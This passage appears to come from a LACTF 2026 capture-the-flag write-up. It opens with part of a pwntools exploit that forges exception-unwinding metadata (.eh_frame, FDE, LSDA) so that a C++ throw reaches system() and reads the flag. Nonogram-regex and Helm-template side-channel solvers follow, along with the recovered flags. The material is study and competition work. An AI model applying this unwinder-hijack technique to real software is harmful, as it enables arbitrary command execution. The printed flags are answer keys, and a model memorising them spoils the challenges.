        more = not ((x_shifted == 0 and sign_bit == 0) or (x_shifted == -1 and sign_bit != 0))
        out.append((b | 0x80) if more else b)
        x = x_shifted
    return bytes(out)


@dataclass(frozen=True)
class VMA:
    # Link-time VMAs. PIE base cancels out for pcrel/datarel computations.
    eh_frame_hdr: int = 0x2010
    eh_frame: int = 0x2048

    f_start: int = 0x11A9
    f_size: int = 0x2F

    # Fake "handler function" range that covers main's IP (0x125a) and our landing pad (0x1213).
    handler_start: int = 0x1200
    handler_size: int = 0x200

    landing_pad: int = 0x1213  # `call system@plt` inside g()'s catch block

    # Useful constants in the binary
    main_ret_after_f: int = 0x125A  # return address after `call f()` in main
    typeinfo_charptr: int = 0x3D40  # _ZTIPKc
    dw_ref_personality: int = 0x4018  # DW.ref.__gxx_personality_v0


def align4(x: int) -> int:
    return (x + 3) & ~3


def build_eh_frame_hdr(*, entries: list[tuple[int, int]]) -> bytes:
    """
    Minimal .eh_frame_hdr (version 1) with a datarel sdata4 table.
    """
    v = VMA()
    hdr = bytearray()
    hdr += p8(0x01)  # version
    hdr += p8(0x1B)  # eh_frame_ptr_enc: DW_EH_PE_pcrel | DW_EH_PE_sdata4
    hdr += p8(0x03)  # fde_count_enc: DW_EH_PE_udata4
    hdr += p8(0x3B)  # table_enc: DW_EH_PE_datarel | DW_EH_PE_sdata4

    # Encoded pointer to .eh_frame (pcrel sdata4, base = this field)
    eh_frame_ptr_field = v.eh_frame_hdr + 4
    hdr += p32s(v.eh_frame - eh_frame_ptr_field)

    # fde_count (udata4)
    hdr += p32(len(entries))

    # Table entries: (initial_location, fde_address), both datarel sdata4.
    data_base = v.eh_frame_hdr
    for initial_loc_vma, fde_vma in entries:
        hdr += p32s(initial_loc_vma - data_base)
        hdr += p32s(fde_vma - data_base)

    # Original header is 0x34 bytes; keep size the same.
    return bytes(hdr).ljust(0x34, b"\x00")


def build_cie_zplr(*, cie_vma: int) -> bytes:
    """
    CIE with:
      - zPLR augmentation
      - personality pointer (indirect pcrel sdata4)
      - LSDA encoding (pcrel sdata4)
      - FDE encoding (pcrel sdata4)
    """
    v = VMA()
    out = bytearray()
    out += p32(0x1C)  # length
    out += p32(0x00000000)  # CIE_id
    out += p8(0x01)  # version
    out += b"zPLR\x00"
    out += uleb128(1)  # code alignment
    out += sleb128(-8)  # data alignment
    out += uleb128(16)  # return reg (RIP)
    out += uleb128(7)  # augmentation data length

    # P: personality encoding
    out += p8(0x9B)  # DW_EH_PE_indirect | DW_EH_PE_pcrel | DW_EH_PE_sdata4
    personality_ptr_field_vma = cie_vma + len(out)
    out += p32s(v.dw_ref_personality - personality_ptr_field_vma)

    # L: LSDA encoding, R: FDE encoding
    out += p8(0x1B)  # LSDA: pcrel sdata4
    out += p8(0x1B)  # FDE pointers: pcrel sdata4

    # Initial CFI: CFA = rsp + 8; RA = [CFA-8]
    out += b"\x0c\x07\x08"  # DW_CFA_def_cfa r7(rsp), 8
    out += b"\x90\x01"  # DW_CFA_offset RIP, 1 * data_align (-8) => CFA-8
    out += b"\x00\x00"  # padding

    assert len(out) == 0x20
    return bytes(out)


def build_lsda_no_handler(*, f_range: int) -> bytes:
    # LPStart omitted, no type table, one call-site entry with landing pad 0 and action 0.
    b = bytearray()
    b += p8(0xFF)  # LPStart omitted
    b += p8(0xFF)  # TType omitted
    b += p8(0x01)  # call-site encoding: uleb128
    call_site = bytearray()
    call_site += uleb128(0)  # start
    call_site += uleb128(f_range)  # length
    call_site += uleb128(0)  # landing pad = 0
    call_site += uleb128(0)  # action = 0
    b += uleb128(len(call_site))
    b += call_site
    return bytes(b)


def build_lsda_handler(*, lsda_vma: int) -> bytes:
    """
    LSDA that catches `const char*` and transfers to VMA().landing_pad.
    """
    v = VMA()
    b = bytearray()

    # LPStart omitted => bases are relative to the FDE's initial_location (handler_start).
    b += p8(0xFF)

    # Type table present; use pcrel sdata4 direct pointer to _ZTIPKc.
    b += p8(0x1B)  # TType encoding: pcrel sdata4
    ttype_off_index = len(b)
    b += p8(0x00)  # placeholder ttype_offset (we keep it 1 byte)
    pos_after_ttype = lsda_vma + len(b)

    b += p8(0x01)  # call-site encoding: uleb128

    # One call-site entry: cover full handler range.
    landing_pad_off = v.landing_pad - v.handler_start
    call_site = bytearray()
    call_site += uleb128(0)  # start
    call_site += uleb128(v.handler_size)  # length
    call_site += uleb128(landing_pad_off)  # landing pad offset
    call_site += uleb128(1)  # action table offset + 1
    b += uleb128(len(call_site))
    b += call_site

    # Action table: catch type #1, then end.
    b += sleb128(1)
    b += sleb128(0)

    # Type table: one entry placed immediately before ttype_base (end of LSDA).
    type_entry_vma = lsda_vma + len(b)
    b += p32s(v.typeinfo_charptr - type_entry_vma)

    # Patch ttype_offset so that ttype_base == end_of_lsda.
    ttype_base = lsda_vma + len(b)
    ttype_offset = ttype_base - pos_after_ttype
    assert 0 <= ttype_offset < 0x80
    b[ttype_off_index] = ttype_offset

    return bytes(b)


def build_fde_for_f(*, cie_vma: int, fde_vma: int, lsda_vma: int, cmd_vma: int) -> bytes:
    v = VMA()
    out = bytearray()

    out += p32(0)  # placeholder length
    cie_ptr_field_vma = fde_vma + len(out)
    out += p32(cie_ptr_field_vma - cie_vma)  # offset back to CIE

    # initial_location (pcrel sdata4)
    initial_loc_field_vma = fde_vma + len(out)
    out += p32s(v.f_start - initial_loc_field_vma)
    out += p32(v.f_size)  # address_range

    # Augmentation length + LSDA pointer
    out += uleb128(4)
    lsda_ptr_field_vma = fde_vma + len(out)
    out += p32s(lsda_vma - lsda_ptr_field_vma)

    # We can't reliably control caller-saved regs like RDI via CFI on all
    # libgcc builds. Empirically, arriving at our landing pad yields RDI==RSP.
    # So: set the caller frame's CFA to point at our command string, spoof the
    # caller RIP into our fake handler range, and then explicitly restore RSP
    # back onto the real stack for system().
    #
    # Unwind IP for f() is typically the return address after `call __cxa_throw`,
    # which is the next instruction at 0x11d8.
    throw_site = 0x11D8

    def expr_rip_plus(delta: int) -> bytes:
        e = bytearray()
        e += p8(0x80) + sleb128(0)  # DW_OP_breg16 (RIP) + 0
        e += p8(0x11) + sleb128(delta)  # DW_OP_consts delta
        e += p8(0x22)  # DW_OP_plus
        return bytes(e)

    # CFA = &cmd (in our overwrite buffer)
    cfa_expr = expr_rip_plus(cmd_vma - throw_site)
    out += p8(0x0F)  # DW_CFA_def_cfa_expression
    out += uleb128(len(cfa_expr))
    out += cfa_expr

    # Spoof caller RIP into our fake handler range so phase 1 consults our handler FDE/LSDA.
    handler_ip = v.handler_start + 1
    rip_expr = expr_rip_plus(handler_ip - throw_site)
    out += p8(0x16)  # DW_CFA_val_expression
    out += uleb128(16)  # reg = RIP (return address column)
    out += uleb128(len(rip_expr))
    out += rip_expr

    # Keep the actual stack pointer on the real stack:
    # rsp = rbp + 16 (standard caller RSP for a frame-pointer function).
    rsp_expr = bytearray()
    rsp_expr += p8(0x76) + sleb128(16)  # DW_OP_breg6 (RBP) + 16
    out += p8(0x16)  # DW_CFA_val_expression
    out += uleb128(7)  # reg = RSP
    out += uleb128(len(rsp_expr))
    out += bytes(rsp_expr)

    while (len(out) - 4) % 4 != 0:
        out += b"\x00"

    out[0:4] = p32(len(out) - 4)
    return bytes(out)


def build_fde_for_handler(*, cie_vma: int, fde_vma: int, lsda_vma: int) -> bytes:
    v = VMA()
    out = bytearray()

    out += p32(0)  # placeholder length
    cie_ptr_field_vma = fde_vma + len(out)
    out += p32(cie_ptr_field_vma - cie_vma)  # offset back to CIE

    initial_loc_field_vma = fde_vma + len(out)
    out += p32s(v.handler_start - initial_loc_field_vma)  # initial_location
    out += p32(v.handler_size)  # address_range

    out += uleb128(4)  # augmentation length
    lsda_ptr_field_vma = fde_vma + len(out)
    out += p32s(lsda_vma - lsda_ptr_field_vma)

    # Match main() prologue (frame pointer) so stack looks sane if unwinding continues.
    out += b"\x0c" + uleb128(6) + uleb128(16)  # DW_CFA_def_cfa rbp, 16
    out += b"\x86" + uleb128(2)  # DW_CFA_offset rbp, CFA-16

    while (len(out) - 4) % 4 != 0:
        out += b"\x00"

    out[0:4] = p32(len(out) - 4)
    return bytes(out)


def build_payload() -> bytes:
    v = VMA()
    payload = bytearray(b"\x00" * 0x100)

    cie_vma = v.eh_frame
    cie = build_cie_zplr(cie_vma=cie_vma)

    fde_f_vma = cie_vma + len(cie)
    lsda_f_vma = 0x20C0
    lsda_h_vma = 0x20D0
    cmd_vma = 0x20F0

    fde_f = build_fde_for_f(cie_vma=cie_vma, fde_vma=fde_f_vma, lsda_vma=lsda_f_vma, cmd_vma=cmd_vma)
    fde_h_vma = align4(fde_f_vma + len(fde_f))
    fde_h = build_fde_for_handler(cie_vma=cie_vma, fde_vma=fde_h_vma, lsda_vma=lsda_h_vma)

    # .eh_frame terminator after last FDE
    term_vma = fde_h_vma + len(fde_h)
    term_vma = align4(term_vma)

    lsda_f = build_lsda_no_handler(f_range=v.f_size)
    lsda_h = build_lsda_handler(lsda_vma=lsda_h_vma)

    eh_hdr = build_eh_frame_hdr(
        entries=[
            (v.f_start, fde_f_vma),
            (v.handler_start, fde_h_vma),
        ]
    )

    def put(vma: int, data: bytes) -> None:
        off = vma - v.eh_frame_hdr
        assert 0 <= off <= 0x100
        assert off + len(data) <= 0x100
        payload[off : off + len(data)] = data

    put(v.eh_frame_hdr, eh_hdr)
    put(cie_vma, cie)
    put(fde_f_vma, fde_f)
    put(fde_h_vma, fde_h)
    put(term_vma, p32(0))
    put(lsda_f_vma, lsda_f)
    put(lsda_h_vma, lsda_h)
    # Pad with spaces so small RIP differences still yield a valid `/bin/sh -c` command.
    put(cmd_vma, b"        cat flag.txt\x00")

    return bytes(payload)


def main() -> None:
    ap = argparse.ArgumentParser()
    ap.add_argument("--host", default="chall.lac.tf")
    ap.add_argument("--port", default=31152, type=int)
    ap.add_argument("--local", action="store_true")
    args = ap.parse_args()

    context.clear(arch="amd64", os="linux")
    payload = build_payload()

    if args.local:
        io = process(["./attachments/chall"])
    else:
        io = remote(args.host, args.port)

    io.send(payload)
    data = io.recvall(timeout=2)
    if data:
        print(data.decode(errors="replace"), end="")


if __name__ == "__main__":
    main()
```

***

## rev

### flag-finder

#### Description

The challenge provides a web UI with a 19x101 checkbox grid. Pressing "Find" serializes the grid as a 1919-character string of `#` (checked) and `.` (unchecked) and tests it against a single huge JavaScript regex in `script.js`.

The regex encodes a nonogram: one set of constraints for each row and each column. Solving the nonogram reveals 3 lines of 3x5 pixel text spelling the flag.

#### Solution

1. Fetch `script.js` from the challenge and extract the `const theFlag = /^...$/;` regex.
2. Parse constraints from the regex.

* Row constraints: after the `(?=^.{1919}$)` marker, there are 19 capturing groups, one per row, that contain `#` and `#{n}` runs separated by `\.+` (at least one `.`). Converting each group into a list of run-lengths gives the row clues.
* Column constraints: at the start of the regex there is a large group of nested `(?=...)` lookaheads. Each leaf lookahead constrains a single column by repeatedly jumping by `WIDTH` (`.{col}X.{WIDTH-1-col}` patterns). Counting the `(?: ... # ... ){n}` pieces yields the run-lengths for that column.

3. Solve the 19x101 nonogram.

* Use a standard nonogram line-solver with DP: for a given line (row or column) with some forced cells (filled/empty/unknown) and a list of runs, enumerate valid placements via dynamic programming and compute which cells are always filled or always empty.
* Propagate row/column deductions until no more changes.
* If cells remain unknown, backtrack (try `#` then `.`) with propagation at each step.

4. Decode the solved grid.

* The text is arranged as 3 bands of 25 characters each.
* For each band, take rows `6*band+1 .. 6*band+5` (5 rows) and columns in 25 blocks of 3 pixels with 1-column gaps: block `k` is columns `4*k+1 .. 4*k+3`.
* Map each 3x5 bitmap to a character (letters plus leetspeak digits/punctuation).

Decoded flag (from the solved grid): `lactf{Wh47_d0_y0u_637_wh3n_y0u_cr055_4_r363x_4nd_4_n0n06r4m?_4_r363x06r4m!}`
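
The core line-solver deduction can be demonstrated with a brute-force miniature (the real solver uses a memoized DP, but on a short line exhaustive enumeration shows the same always-filled / always-empty logic):

```python
from itertools import product

def runs_of(line):
    """Run-lengths of the filled cells in a 0/1 line."""
    runs, cur = [], 0
    for v in line:
        if v:
            cur += 1
        elif cur:
            runs.append(cur)
            cur = 0
    if cur:
        runs.append(cur)
    return runs

def forced_cells(length, runs):
    """Brute-force every placement: 1 = always filled, 0 = always empty,
    None = varies between valid placements."""
    sols = [l for l in product((0, 1), repeat=length) if runs_of(l) == runs]
    out = []
    for i in range(length):
        vals = {l[i] for l in sols}
        out.append(vals.pop() if len(vals) == 1 else None)
    return out
```

For a 5-cell line with a single run of 3, the placements are `11100`, `01110`, `00111`; only the center cell is common to all, so `forced_cells(5, [3])` forces just that cell. Propagating such deductions across all rows and columns (and backtracking on any cells that remain unknown) is exactly how the 19x101 grid gets solved.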

Solver (end-to-end: fetch regex, parse clues, solve, render):

```python
#!/usr/bin/env python3
import re
import sys
from functools import lru_cache
from urllib.request import urlopen, Request

WIDTH = 101
HEIGHT = 19
N = WIDTH * HEIGHT

URL = "https://flag-finder.chall.lac.tf/script.js"


def fetch_script() -> str:
    req = Request(URL, headers={"User-Agent": "ctf-solver"})
    with urlopen(req, timeout=30) as resp:
        return resp.read().decode("utf-8", errors="replace")


def extract_regex(js: str) -> str:
    # Extract between `const theFlag = /` and `$/;`
    m = re.search(r"const\s+theFlag\s*=\s*/\^(.*)\$\/;", js, flags=re.S)
    if not m:
        raise RuntimeError("could not extract regex")
    return "^" + m.group(1) + "$"


def extract_lookaheads(prefix: str):
    # Extract all (?=...) blocks with balanced parentheses.
    out = []
    i = 0
    # Important: lookaheads are nested (there's an outer (?=...) containing many inner (?=...)),
    # so we must allow overlaps and keep scanning inside already-extracted spans.
    while i < len(prefix):
        if not prefix.startswith("(?=", i):
            i += 1
            continue

        j = i
        depth = 0
        k = j
        while k < len(prefix):
            ch = prefix[k]
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
                if depth == 0:
                    out.append(prefix[j : k + 1])
                    break
            k += 1
        else:
            raise RuntimeError("unbalanced parentheses while extracting lookahead")

        i = j + 3
    return out


def infer_col_idx(lookahead_content: str) -> int:
    # Find the first (?: ... ) stride group and infer the fixed column index from its leading wildcard length.
    m = re.search(r"\(\?:([^)]*)\)", lookahead_content)
    if not m:
        raise RuntimeError(f"no (?:...) stride found in lookahead: {lookahead_content[:80]}...")
    inside = m.group(1)

    if inside.startswith(".{"):
        m2 = re.match(r"\.\{(\d+)\}", inside)
        if not m2:
            raise RuntimeError(f"failed to parse .{{n}} prefix: {inside[:40]}")
        return int(m2.group(1))
    if inside.startswith("."):
        # Single wildcard '.' means lead=1
        return 1
    if inside.startswith("\\.") or inside.startswith("#"):
        return 0

    raise RuntimeError(f"unrecognized stride prefix: {inside[:40]}")


def parse_runs_from_row_group(group_pat: str):
    runs = []
    i = 0
    while i < len(group_pat):
        if group_pat[i] == "#":
            if i + 1 < len(group_pat) and group_pat[i + 1] == "{":
                j = group_pat.find("}", i + 2)
                if j == -1:
                    raise RuntimeError(f"unterminated #{{n}} in {group_pat}")
                runs.append(int(group_pat[i + 2 : j]))
                i = j + 1
            else:
                runs.append(1)
                i += 1
        else:
            i += 1
    return runs


def parse_runs_from_col_lookahead(lookahead_content: str):
    runs = []
    # Find each (?: ... # ... ) with optional {n} quantifier.
    for m in re.finditer(r"\(\?:[^)]*#[^)]*\)(?:\{(\d+)\})?", lookahead_content):
        n = m.group(1)
        runs.append(int(n) if n else 1)
    return runs


def extract_row_groups(row_part: str):
    # Capturing groups ( ... ) that are not special groups like (?: or (?<= ... )
    # Row groups have no nested parentheses, so this is safe.
    return re.findall(r"\((?!\?)([^()]*)\)", row_part)


def deduce_line(assign, runs):
    L = len(assign)
    mask = (1 << L) - 1

    pref_one = [0] * (L + 1)
    pref_zero = [0] * (L + 1)
    for i, v in enumerate(assign):
        pref_one[i + 1] = pref_one[i] + (1 if v == 1 else 0)
        pref_zero[i + 1] = pref_zero[i] + (1 if v == 0 else 0)

    def has_one(a, b):
        return (pref_one[b] - pref_one[a]) != 0

    def has_zero(a, b):
        return (pref_zero[b] - pref_zero[a]) != 0

    @lru_cache(None)
    def dp(i, pos):
        # Return (union_filled, inter_filled) for suffix starting at pos placing runs[i:]
        if i == len(runs):
            if has_one(pos, L):
                return None
            return (0, 0)

        r = runs[i]
        union_total = 0
        inter_total = None

        max_start = L - r
        for s in range(pos, max_start + 1):
            # empties before run
            if has_one(pos, s):
                continue
            # run cells cannot contain forced empty
            if has_zero(s, s + r):
                continue

            if i != len(runs) - 1:
                # need a gap cell
                if s + r >= L:
                    continue
                if assign[s + r] == 1:
                    continue
                nxt = s + r + 1
            else:
                nxt = s + r

            tail = dp(i + 1, nxt)
            if tail is None:
                continue
            union_tail, inter_tail = tail

            run_bits = ((1 << r) - 1) << s
            union_here = run_bits | union_tail
            inter_here = run_bits | inter_tail

            union_total |= union_here
            inter_total = inter_here if inter_total is None else (inter_total & inter_here)

        if inter_total is None:
            return None
        return (union_total & mask, inter_total & mask)

    res = dp(0, 0)
    if res is None:
        return None

    union_filled, inter_filled = res

    forced = list(assign)
    for j in range(L):
        bit = 1 << j
        can_fill = (union_filled & bit) != 0
        must_fill = (inter_filled & bit) != 0

        if must_fill:
            if forced[j] == 0:
                return None
            forced[j] = 1
        elif not can_fill:
            if forced[j] == 1:
                return None
            forced[j] = 0

    return forced


def solve_nonogram(row_runs, col_runs):
    grid = [[-1] * WIDTH for _ in range(HEIGHT)]

    def propagate():
        changed = True
        while changed:
            changed = False

            # Rows
            for r in range(HEIGHT):
                ded = deduce_line(tuple(grid[r]), tuple(row_runs[r]))
                if ded is None:
                    return False
                if list(ded) != grid[r]:
                    for c in range(WIDTH):
                        if grid[r][c] != ded[c]:
                            grid[r][c] = ded[c]
                            changed = True

            # Columns
            for c in range(WIDTH):
                col = tuple(grid[r][c] for r in range(HEIGHT))
                ded = deduce_line(col, tuple(col_runs[c]))
                if ded is None:
                    return False
                if any(grid[r][c] != ded[r] for r in range(HEIGHT)):
                    for r in range(HEIGHT):
                        if grid[r][c] != ded[r]:
                            grid[r][c] = ded[r]
                            changed = True

        return True

    def find_unknown():
        for r in range(HEIGHT):
            for c in range(WIDTH):
                if grid[r][c] == -1:
                    return (r, c)
        return None

    def backtrack():
        if not propagate():
            return False
        unk = find_unknown()
        if unk is None:
            return True

        r, c = unk
        snapshot = [row[:] for row in grid]

        for v in (1, 0):
            grid[r][c] = v
            if backtrack():
                return True
            # restore
            for rr in range(HEIGHT):
                grid[rr] = snapshot[rr][:]

        return False

    if not backtrack():
        raise RuntimeError("no solution")

    return grid


def render_grid(grid):
    return "\n".join("".join("#" if v == 1 else "." for v in row) for row in grid)


def flatten_grid(grid):
    return "".join("".join("#" if v == 1 else "." for v in row) for row in grid)


def render_bands(grid):
    # Print each of 3 bands (6 rows: 5 glyph rows + descender row) with spaces between glyphs.
    out = []
    for band in range(3):
        y0 = 6 * band + 1
        out.append(f"[band {band} rows {y0}-{y0+5}]")
        for dy in range(6):
            y = y0 + dy
            line = []
            for k in range(25):
                x0 = 4 * k + 1
                block = "".join("#" if grid[y][x] == 1 else " " for x in range(x0, x0 + 3))
                line.append(block)
            out.append(" ".join(line))
        out.append("")
    return "\n".join(out)


def extract_glyphs(grid):
    # 3 bands, 25 glyphs each, 3x5. (Separator rows may contain decoration; ignore them.)
    glyphs = []
    for band in range(3):
        y0 = 6 * band + 1
        for k in range(25):
            x0 = 4 * k + 1
            g = []
            for dy in range(5):
                y = y0 + dy
                g.append("".join("#" if grid[y][x] == 1 else "." for x in range(x0, x0 + 3)))
            glyphs.append(tuple(g))
    return glyphs


def check_candidate(glyphs, name, cand):
    if len(cand) != len(glyphs):
        print(f"[check:{name}] length mismatch: cand={len(cand)} glyphs={len(glyphs)}")
        return False

    mp = {}
    conflicts = []
    for i, ch in enumerate(cand):
        g = glyphs[i]
        if ch in mp and mp[ch] != g:
            conflicts.append((i, ch))
        mp.setdefault(ch, g)

    if conflicts:
        print(f"[check:{name}] conflicts={len(conflicts)} (showing up to 10): {conflicts[:10]}")
        return False

    print(f"[check:{name}] OK")
    return True


def main():
    js = fetch_script()
    full_re = extract_regex(js)

    # Split regex into prefix (column assertions) and row part.
    marker = "(?=^.{1919}$)"
    idx = full_re.find(marker)
    if idx == -1:
        raise RuntimeError("marker not found")

    prefix = full_re[:idx]
    row_part = full_re[idx + len(marker) :]

    # Rows
    row_groups = extract_row_groups(row_part)
    if len(row_groups) != HEIGHT:
        raise RuntimeError(f"expected {HEIGHT} row groups, got {len(row_groups)}")
    row_runs = [parse_runs_from_row_group(g) for g in row_groups]

    # Columns
    all_lookaheads = extract_lookaheads(prefix)
    leaf_lookaheads = []
    for la in all_lookaheads:
        content = la[3:-1]
        if "(?=" in content:
            continue
        leaf_lookaheads.append(content)

    cols_by_idx = {}
    for content in leaf_lookaheads:
        c = infer_col_idx(content)
        cols_by_idx[c] = parse_runs_from_col_lookahead(content)

    if len(cols_by_idx) != WIDTH:
        missing = sorted(set(range(WIDTH)) - set(cols_by_idx))
        raise RuntimeError(f"expected {WIDTH} columns, got {len(cols_by_idx)}; missing={missing[:10]}")

    col_runs = [cols_by_idx[c] for c in range(WIDTH)]

    grid = solve_nonogram(row_runs, col_runs)

    s = flatten_grid(grid)
    if len(s) != N:
        raise RuntimeError("grid length mismatch")

    # Verify against the actual JS regex via Python re (should match exactly).
    # Python and JS regex syntax match for this pattern usage.
    if not re.fullmatch(full_re, s):
        raise RuntimeError("solution grid does not match regex")

    glyphs = extract_glyphs(grid)
    print(render_bands(grid))

    # Sanity-check common candidate transcriptions.
    c1 = "lactf{wh47_do_you_637_wh3n_you_cross_4_r363x_4nd_4_nono6r4m?_4_r363xo6r4m!}"
    c2 = "lactf{what_do_you_get_when_you_cross_a_regex_and_a_nonogram?_a_regexogram!}"
    check_candidate(glyphs, "leet", c1)
    check_candidate(glyphs, "decoded", c2)


if __name__ == "__main__":
    main()
```

### helm hell

#### Description

We are given a Helm chart (`helm-hell.zip`). Rendering it always produces a ConfigMap with `result: "false"`.

#### Solution

The core logic lives in `work/helm-hell/templates/_helpers.tpl`: thousands of `define` blocks that implement a tiny VM using only Go-template/Sprig primitives (`dict`, `set`, `index`, `add`, `sub`, `mod`, etc.).

Even though the final rendered output is always `false`, the VM still performs prefix-dependent work on `.Values.input`. We can exploit a deterministic side channel:

* The VM uses a small tape `sea` (a map keyed by stringified integers).
* Early in execution, `sea["2"]` is set to `1` and later cleared back to `0`.
* The exact **number of executed template statements** and the current **input index** (`logbook`) at the moment `sea["2"]` transitions `1 -> 0` both increase when more of the provided input prefix matches the embedded expected flag.

So we:

1. Implement a minimal interpreter for this limited Go-template subset.
2. Execute the entry template `volumeWorker7940` with `provisions = .Values.input`.
3. Stop exactly when `sea["2"]` clears from `1` to `0`, returning `(logbook, steps)`.
4. Recover the flag one character at a time by trying a charset and choosing the character that maximizes `(logbook, steps)` (using constant padding so the program never runs out of input).

Recovered flag: `lactf{t4k1ng_7h3_h3lm_0f_h31m_73mp14t3s}`

**Solver Code**

```python
#!/usr/bin/env python3
"""Solve LACTF 2026: helm hell

The provided Helm chart always renders `false`, but the (obfuscated) template VM
still runs a prefix-checker internally. We exploit a deterministic side channel:
track the moment tape cell `sea["2"]` is cleared from 1 -> 0. The number of
steps executed and the `logbook` (input index) at that moment both increase when
more of the flag prefix matches.

This script:
- Parses templates/_helpers.tpl into a tiny Go-template interpreter.
- Executes the entry template until the 1->0 clear event.
- Brute-forces the flag one character at a time by maximizing (logbook, steps).
"""

import re
import string
from dataclasses import dataclass

TPL_PATH = "work/helm-hell/templates/_helpers.tpl"
BLOCK_RE = re.compile(r"\{\{-\s*(.*?)\s*-\}\}")


# -------- Expression parsing --------

def tokenize_expr(s: str):
    toks = []
    i = 0
    n = len(s)
    while i < n:
        c = s[i]
        if c.isspace():
            i += 1
            continue
        if c in "()":
            toks.append(c)
            i += 1
            continue
        if c == '"':
            i += 1
            out = []
            while i < n:
                if s[i] == '"':
                    break
                if s[i] == "\\" and i + 1 < n:
                    out.append(s[i + 1])
                    i += 2
                    continue
                out.append(s[i])
                i += 1
            if i >= n or s[i] != '"':
                raise ValueError(f"unterminated string: {s!r}")
            i += 1
            toks.append(("str", "".join(out)))
            continue
        j = i
        while j < n and (not s[j].isspace()) and s[j] not in "()":
            j += 1
        toks.append(s[i:j])
        i = j
    return toks


def parse_atom(tok):
    if isinstance(tok, tuple) and tok[0] == "str":
        return ("str", tok[1])
    if tok == "true":
        return ("bool", True)
    if tok == "false":
        return ("bool", False)
    if re.fullmatch(r"-?\d+", tok):
        return ("int", int(tok))
    if tok.startswith("$"):
        if "." in tok:
            base, rest = tok.split(".", 1)
            return ("varpath", base, rest.split("."))
        return ("var", tok)
    if tok.startswith("."):
        return ("dot", tok)
    return ("ident", tok)


def parse_expr_tokens(toks, pos=0, stop_at=None):
    terms = []
    n = len(toks)
    while pos < n:
        t = toks[pos]
        if stop_at is not None and t == stop_at:
            break
        if t == "(":
            sub, pos = parse_expr_tokens(toks, pos + 1, stop_at=")")
            if pos >= n or toks[pos] != ")":
                raise ValueError("missing ')'")
            pos += 1
            terms.append(sub)
            continue
        terms.append(parse_atom(t))
        pos += 1

    if not terms:
        return ("nil", None), pos
    if len(terms) == 1:
        # `(dict)` is used to construct empty maps.
        if terms[0][0] == "ident" and terms[0][1] in {"dict"}:
            return ("call", terms[0][1], []), pos
        return terms[0], pos

    head = terms[0]
    if head[0] != "ident":
        raise ValueError(f"call head not ident: {head}")
    return ("call", head[1], terms[1:]), pos


def parse_expr(s: str):
    toks = tokenize_expr(s)
    expr, pos = parse_expr_tokens(toks, 0, stop_at=None)
    if pos != len(toks):
        raise ValueError(f"unconsumed tokens: {toks[pos:]}")
    return expr


def is_empty(v):
    if v is None:
        return True
    if v is False:
        return True
    if v == 0:
        return True
    if v == "" or v == b"":
        return True
    if isinstance(v, (list, dict, tuple, set)) and len(v) == 0:
        return True
    return False


def to_int(v):
    if isinstance(v, bool):
        return 1 if v else 0
    if isinstance(v, int):
        return v
    if isinstance(v, str):
        v = v.strip()
        return 0 if v == "" else int(v, 10)
    return int(v)


def eval_dot(dot, ref: str):
    cur = dot
    if ref == ".":
        return cur
    path = ref[1:].split(".")
    for p in path:
        if isinstance(cur, dict):
            cur = cur.get(p)
        else:
            cur = getattr(cur, p)
    return cur


def eval_expr(expr, vars_, dot):
    t = expr[0]
    if t == "nil":
        return None
    if t == "int":
        return expr[1]
    if t == "str":
        return expr[1]
    if t == "bool":
        return expr[1]
    if t == "var":
        return vars_[expr[1]]
    if t == "varpath":
        cur = vars_[expr[1]]
        for p in expr[2]:
            if isinstance(cur, dict):
                cur = cur.get(p)
            else:
                cur = getattr(cur, p)
        return cur
    if t == "dot":
        return eval_dot(dot, expr[1])
    if t == "ident":
        return expr[1]

    # call
    fn = expr[1]
    args = [eval_expr(a, vars_, dot) for a in expr[2]]

    if fn == "add":
        return to_int(args[0]) + to_int(args[1])
    if fn == "sub":
        return to_int(args[0]) - to_int(args[1])
    if fn == "mul":
        return to_int(args[0]) * to_int(args[1])
    if fn == "mod":
        return to_int(args[0]) % to_int(args[1])
    if fn == "len":
        return len(args[0])
    if fn == "printf":
        fmt = args[0]
        if not isinstance(fmt, str):
            fmt = str(fmt)
        vals = []
        for v in args[1:]:
            if isinstance(v, bytes):
                v = v.decode("latin-1")
            vals.append(v)
        if len(vals) == 0:
            return fmt
        if len(vals) == 1:
            return fmt % vals[0]
        return fmt % tuple(vals)
    if fn == "int":
        return to_int(args[0])
    if fn == "default":
        dflt, v = args[0], args[1]
        return dflt if is_empty(v) else v
    if fn == "dict":
        if len(args) % 2 != 0:
            raise ValueError("dict requires even args")
        m = {}
        for i in range(0, len(args), 2):
            k = args[i]
            v = args[i + 1]
            if not isinstance(k, str):
                k = str(k)
            m[k] = v
        return m
    if fn == "index":
        container, key = args[0], args[1]
        if isinstance(container, dict):
            # Go templates require matching key types; in this chart `sea` is
            # keyed by strings, so callers always pass string keys.
            return container.get(key) if isinstance(key, str) else None
        if isinstance(container, (bytes, bytearray)):
            return container[to_int(key)]
        if isinstance(container, str):
            return ord(container[to_int(key)])
        return container[to_int(key)]
    if fn == "set":
        m, k, v = args[0], args[1], args[2]
        if not isinstance(m, dict):
            raise ValueError("set on non-dict")
        if not isinstance(k, str):
            k = str(k)
        m[k] = v
        return m
    if fn == "ternary":
        a, b, cond = args[0], args[1], args[2]
        return a if bool(cond) else b

    if fn == "ne":
        return args[0] != args[1]
    if fn == "lt":
        return to_int(args[0]) < to_int(args[1])
    if fn == "gt":
        return to_int(args[0]) > to_int(args[1])

    raise KeyError(f"unsupported function: {fn}")


# -------- Template parsing and execution --------


@dataclass
class Stmt:
    kind: str
    a: object = None
    b: object = None


def parse_templates(path: str):
    templates = {}
    cur_name = None
    cur_stmts = None
    block_stack = []

    def finish():
        nonlocal cur_name, cur_stmts
        if cur_name is not None:
            templates[cur_name] = cur_stmts
        cur_name = None
        cur_stmts = None

    with open(path, "r", encoding="utf-8", errors="replace") as f:
        for line in f:
            for m in BLOCK_RE.finditer(line):
                content = m.group(1).strip()
                if not content:
                    continue
                if content.startswith('define '):
                    name_m = re.match(r'define\s+"([^"]+)"', content)
                    if not name_m:
                        raise ValueError(f"bad define: {content}")
                    finish()
                    cur_name = name_m.group(1)
                    cur_stmts = []
                    block_stack = ["define"]
                    continue
                if content == "end":
                    ended = block_stack.pop()
                    if ended == "define":
                        finish()
                    else:
                        cur_stmts.append(Stmt("end"))
                    continue
                if cur_name is None:
                    continue
                if content.startswith("if "):
                    cur_stmts.append(Stmt("if", parse_expr(content[3:].strip())))
                    block_stack.append("if")
                    continue

                am = re.match(r'^(\$[A-Za-z0-9_\.]+|\$_)\s*(:=|=)\s*(.*)$', content)
                if am:
                    lhs, rhs = am.group(1), am.group(3)
